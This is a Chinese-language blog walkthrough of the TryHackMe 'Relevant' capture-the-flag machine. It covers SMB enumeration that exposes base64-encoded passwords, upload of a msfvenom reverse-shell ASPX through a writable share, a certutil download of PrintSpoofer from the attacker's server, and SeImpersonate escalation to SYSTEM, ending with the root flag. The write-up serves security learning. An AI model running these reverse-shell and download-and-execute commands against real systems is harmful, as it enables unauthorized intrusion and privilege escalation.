TryHackMe-进攻性渗透测试-08_Relevant

已于 2023-01-15 14:21:35 修改
阅读量296 收藏
点赞数
分类专栏: 我的网络安全之旅-TryHackMe 文章标签: linux 服务器 web安全 网络安全 jenkins
于 2022-12-24 10:38:34 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_54704239/article/details/128426476
版权

Relevant

您已被分配到需要渗透测试的客户 在 7 天内发布到生产环境中进行。

工作范围

客户端请求 工程师进行评估 提供的虚拟环境。客户要求最小 提供有关评估的信息,希望参与 从恶意行为者的眼睛进行(黑匣子渗透 测试)。客户端要求您保护两个标志(无位置) 提供)作为剥削的证据:

user.txt
root.txt
此外,客户还提供了以下范围津贴:

此服务中允许使用任何工具或技术,但我们要求您先尝试手动利用
找到并记下发现的所有漏洞
将发现的标志提交到仪表板
只有分配给计算机的 IP 地址在范围内
查找并报告所有漏洞(是的,根路径不止一条)

循例 nmap 扫,80的web访问不了,检索smb看看

┌──(root💀kali)-[/home/sugobet]
└─# smbclient -L 10.10.162.209  
┌──(root💀kali)-[/home/sugobet]
└─# smbclient //10.10.162.209/nt4wrksv 
Password for [WORKGROUP\root]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sun Jul 26 05:46:04 2020
  ..                                  D        0  Sun Jul 26 05:46:04 2020
  passwords.txt                       A       98  Sat Jul 25 23:15:33 2020

疑似密码,get下来后打开

是base64,解码后:

Bob - !P@$$W0rD!123
Bill - Juw4nnaM4n420696969!$$$

到这里线索断了,因为也没有开ssh,也没有web,我重新运行nmap,但这次我扫了全部端口,果然还有隐藏端口:

49663/tcp open  unknown
49667/tcp open  unknown
49669/tcp open  unknown

使用nc、curl逐个连接看看:

┌──(root💀kali)-[/home/sugobet]
└─# curl http://10.10.162.209:49663

这个端口获得了响应

gobuster扫一波

/aspnet_client

此外就没别的了,正当我想随便输入个错误路径时,发现没有任何错误页面和回显

随便搞了搞,会想起刚刚的smb目录,我想反正也没啥了,干脆试试,没想到又撞对了:

http://10.10.162.209:49663/nt4wrksv/passwords.txt

居然访问到了smb的目录的文件

我们试试有没有权限写入文件

smb: \> put ./passwords.txt psssss.txt
putting file ./passwords.txt as \psssss.txt (0.1 kb/s) (average 0.1 kb/s)
smb: \> ls
  .                                   D        0  Sun Dec 18 23:07:56 2022
  ..                                  D        0  Sun Dec 18 23:07:56 2022
  passwords.txt                       A       98  Sat Jul 25 23:15:33 2020
  psssss.txt                          A       98  Sun Dec 18 23:07:56 2022

		7735807 blocks of size 4096. 5136276 blocks available

很好,那么根据一般思路,应该就是要上传个reverse shell然后在web上访问getshell

┌──(root💀kali)-[/home/sugobet]
└─# msfvenom -p windows/x64/shell_reverse_tcp lhost=10.11.17.14 lport=8888 -f asp > she11.asp 
smb: \> put ./she11.asp

开启nc监听,访问web

getshell翻车了,没事,按照已经做过的题的思路,我们换个shell后缀再尝试一下,asp不行尝试aspx

尝试这两个是因为上面gobuster扫描到的那个目录,加上是iis

http://10.10.162.209:49663/nt4wrksv/she11.aspx

成功getshell

查询systeminfo和whoami /priv

SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled

SeImpersonatePrivilege,这里可以尝试模拟令牌

通过PrintSpoofer帮助我们利用

┌──(root💀kali)-[/home/sugobet]
└─# python3 -m http.server 8000
目标上:certutil.exe -urlcache -split -f http://10.11.17.14:8000/PrintSpoofer64.exe

C:\Windows\Temp>PrintSpoofer64.exe -i -c cmd
PrintSpoofer64.exe -i -c cmd
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

成功提权root

C:\Users\Administrator\Desktop>type root.txt
type root.txt
THM{1fk5kf469devly1gl320zafgl345pv}
Sugobet
关注
专栏目录
tensorflow_gpu-2.8.0-cp39-cp39-win_amd64.whl
07-14
使用pip在线安装下载很慢,并且下载到中途还有可能失败,所以给大家提供一个CSDN下载地址。下载下来之后的本地安装方法见博文......
chef-relevant-tests:只运行您需要运行的 Chef 测试
06-29
gem install chef-relevant-tests 用法 chef-relevant-tests [old git ref] [expander] 此命令将检查 HEAD 和您之前的 ref(目前只有Berksfile.lock )之间的所有差异来源,并通过将版本差异转换为测试套件名称的...
TryHackMe:Relevant(Windows靶机渗透)
Mysmycbx的博客
04-04 394
几个月前出现了一个新的漏洞,叫做Printspoofer,它利用了Windows中的一个漏洞,其中某些服务帐户需要使用SeImpersonate特权以更高的权限运行。使用SMB共享,我们可以将Printspoofer漏洞上传到计算机,导航到C:/inetpub/wwwroot/nt4wrksv目录,并定位它。在80端口没有发现内容,但是在49663端口发现了一个目录,如图。通过扫描服务,发现了web服务80端口和49663端口,smb的445端口和rdp的3389端口。
TRY HACK ME |RELEVANT渗透测试挑战」
AKAHRZ的博客
06-04 1212
您已被分配给一个客户,该客户希望在一个环境中进行渗透测试,该环境将在 7 天内发布到生产环境中。工作范围:客户要求工程师对提供的虚拟环境进行评估。客户要求提供有关评估的最少信息,希望从恶意行为者的角度进行参与(黑盒渗透测试)。客户要求您保护两个标志(未提供位置)作为利用证明:user.txt root.txt 此外,客户提供了以下范围津贴:本次活动允许使用任何工具或技术,但我们要求您先尝试手动利用 找到并记录所有发现的漏洞 将发现的标志提交到仪表板 只有分配给您机器的 IP 地址在范围内 查找并报告所有漏洞
Try Hack Me学习第一天】
最新发布
Cattle_group的博客
08-18 118
不定期更新tryhackme学习笔记
tryhackme
2303_80978034的博客
04-21 1547
TryHackMe是一个在线的网络安全学习平台,旨在帮助用户学习和提升网络安全技能。它提供了一系列的虚拟实验室和挑战,供用户进行实践和学习。通过TryHackMe,用户可以学习到各种网络安全相关的知识和技术,如渗透测试、漏洞利用、密码破解、网络分析等。TryHackMe的特点包括:.Web(网络安全) Web是CTF竞赛中主要的题型之一,题目涉及到许多常见的WEB漏洞,诸如XSS、文件包含、代码执行、上传漏洞、SQL注入。也有一些简单的关于网络基础知识的考察,例如返回包、TCP-IP、数据包内容和构造。可
[TryHackMe] [Intro to Offensive Security] 网络安全概论.黑掉你的第一个网站
11-01 352
TASK1:什么是进攻性安全?简而言之,攻击性安全是闯入计算机系统、利用软件错误并查找应用程序中的漏洞以获得未经授权的访问的过程。要打败黑客,你需要表现得像个黑客,在网络犯罪分子之前发现漏洞并推荐补丁
tryhackme-2020圣诞挑战-day10
qq_43200143的博客
12-11 253
SMB (Server Message Block) - Natively supported by Windows and not Linux NFS (Network File System) - Natively supported by Linux and not Windows Samba windows和Linux都支持,而且是加密传输 枚举,利用enum4linux -U进行用户探测 ,发现三个用户 -S 选项获取分享列表,有四个 提示说有
PI-JDBC_2017-R2_.exe
05-13
操作说明详情: ...task-blog-BlogCommendFromMachineLearnPai2-3.nonecase
leetcode中国-Data-Structure-and-Algorithms-Relevant-Resource-Collection:我
06-29
Relevant Resource Collection 我收藏的数据结构算法相关文集 本题正解: #define MAX(a, b) (((a) > (b)) ? (a) : (b)) int MaxSubArray(const int nums[], int numSize) { int sum = 0, res = nums[0]; for(int i ...
java简易版开心农场源码-Cloud-Server-Building-and-Server-Development-Relevant-Res
06-05
Relevant Resource Collection 云服务器搭建配置以及服务器开发相关 有用的参考链接 (这里需要注意的是,应该是在本地机器上执行scp命令,而不是在用SSH连接到的远程服务器上。此外,如果远程服务器需要密钥对进行...
TryHackMe-渗透测试7_log
M1n9K1n9的博客
12-21 459
whois、https://dnsdumpster.com/、nslookup的使用,侦察网站的公开信息。
win10无法打开匿名级安全令牌_(Windows 10) 的特殊标识 - Microsoft 365 Security | Microsoft Docs...
weixin_29587979的博客
01-14 581
特殊标识Special Identities04/19/2017本文内容适用范围Applies toWindows Server 2016Windows Server 2016IT 专业人员的本参考主题介绍了特殊的标识组 (这些组有时称为 Windows access 控件中使用的安全组) 。This reference topic for the IT professional describe...
HackTheBox - 学院【CPTS】复习5 - Linux | Windows 权限提升
M1n9K1n9的博客
07-07 778
在此我依然记录一些细节和以前曾忽略的东西。
TryHackMe-基本渗透测试
M1n9K1n9的博客
12-22 1163
这里的主要目标是尽可能多地学习。确保您使用OpenVPN配置文件连接到我们的网络。部署机器并连接到我们的网络查找计算机公开的服务按照上面这句话,我们先使用nmap简单扫一圈┌──(root💀kali)-[]└─#nmap-sS访问80端口的web,好像没东西,到8080端口看一下,有网页。
TryHackMe-Watcher
M1n9K1n9的博客
01-09 331
一台利用 Web 漏洞利用以及一些常见权限提升技术的 boot2root Linux 机器。本来根据前辈的经验,我学习他们一天windows一天linux,但是很可惜tryhackme的windows标签的机器有点少,有点不太够做的样子。
以管理员身份安全地浏览 Web 和读取电子邮件
水手的十八般兵器
06-23 1070
Michael HowardMicrosoft Security Engineering摘要:Michael Howard 讨论了在使用任何工具访问 Internet 时,如何通过去掉不必要的管理特权来以管理员身份运行并安全地访问 Internet 数据。下载 DropMyRights.msi 文件。“用管理帐户运行会危及您的计算机和数据”,对此我已经说过多次,但是我将
TryHackMe-Blog
M1n9K1n9的博客
01-14 1719
比利·乔尔(Billy Joel)在他的家用电脑上写了一个博客,并开始工作。这将是非常棒的!枚举此框并找到隐藏在其上的 2 个标志!比利的笔记本电脑上有一些奇怪的事情。你能四处走动并得到你需要的东西吗?还是你会掉进兔子洞…为了使博客与 AWS 配合使用,您需要将 blog.thm 添加到 /etc/hosts 文件中。
《汽车行车记录仪EMC可靠性测试规范》 HCS19-000410-EMC
The document is titled "CAD_EMC_Environmental_Reliability_Test_spec" and has a date of 24 August 2020 with a version of V.08. It is currently released and classified as confidential. The owner of the ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Sugobet

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值